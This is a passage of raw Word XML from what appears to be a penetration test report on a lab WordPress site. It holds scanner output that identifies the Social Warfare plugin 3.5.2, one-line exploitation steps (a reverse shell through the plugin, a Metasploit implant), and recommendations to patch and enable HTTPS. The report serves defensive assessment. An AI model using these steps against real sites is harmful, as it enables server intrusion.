              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> | Found By: Urls In Homepage (Passive Detection)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000049">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> | Confirmed By:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> |  Urls In 404 Page (Passive Detection)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004B">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> |  Comment (Passive Detection)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004C">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> |</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004D">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> | Version: 3.5.2 (100% confidence)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004E">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> | Found By: Comment (Passive Detection)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> |  - http://www.megaquagga.local/, Match: 'Social Warfare v3.5.2'</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000050">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> | Confirmed By:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000051">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> |  Query Parameter (Passive Detection)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000052">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> |   - http://www.megaquagga.local/wp-content/plugins/social-warfare/assets/css/style.min.css?ver=3.5.2</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000053">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> |   - http://www.megaquagga.local/wp-content/plugins/social-warfare/assets/js/script.min.js?ver=3.5.2</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000054">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> |  Readme - Stable Tag (Aggressive Detection)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000055">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> |   - http://www.megaquagga.local/wp-content/plugins/social-warfare/readme.txt</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000056">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> |  Readme - ChangeLog Section (Aggressive Detection)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000057">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> |   - http://www.megaquagga.local/wp-content/plugins/social-warfare/readme.txt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xs6270mvhkps" w:id="17"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">EXPLOITATION AND POST-EXPLOITATION</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The exploitation phase involved leveraging identified vulnerabilities to compromise the target systems, followed by post-exploitation activities to assess the potential impact. This section provides a detailed account of the actions taken.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_kammj1674nl8" w:id="18"/>
      <w:bookmarkEnd w:id="18"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">EXPLOITATION PHASE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="360" w:hanging="270"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit Social-welfare plugin with reverse shell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jlyax4i3gcfl" w:id="19"/>
      <w:bookmarkEnd w:id="19"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">POST-EXPLOITATION PHASE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000060">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="360" w:hanging="270"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Implemented a Metapsploit implant within server</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x1nn912sv5" w:id="20"/>
      <w:bookmarkEnd w:id="2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63">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_oc0xzvvanf0f" w:id="21"/>
      <w:bookmarkEnd w:id="21"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RECOMMENDATIONS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000064">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This section outlines the recommended actions to address the identified vulnerabilities and enhance the security posture of the target systems. Implementing these measures will help mitigate risks and prevent potential exploitation.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i9x5x3frrob" w:id="22"/>
      <w:bookmarkEnd w:id="22"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Recommendation #1: Update to Current Version</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000067">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Updated any plugin and servers to the most recent version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1lq4g8yb24x4" w:id="23"/>
      <w:bookmarkEnd w:id="23"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Recommendation #2: Enable HTTPs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enable HTTPs in the website to have a secure connection</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wty3dht76el" w:id="24"/>
      <w:bookmarkEnd w:id="2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72">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_vbp7dtbdxja" w:id="25"/>
      <w:bookmarkEnd w:id="25"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CONCLUSION</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000073">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MQP’s website is prone to be exploited by attackers wanting to gain access to the server. This can be avoided by updating everything with the most version.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megaquagga.lo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5"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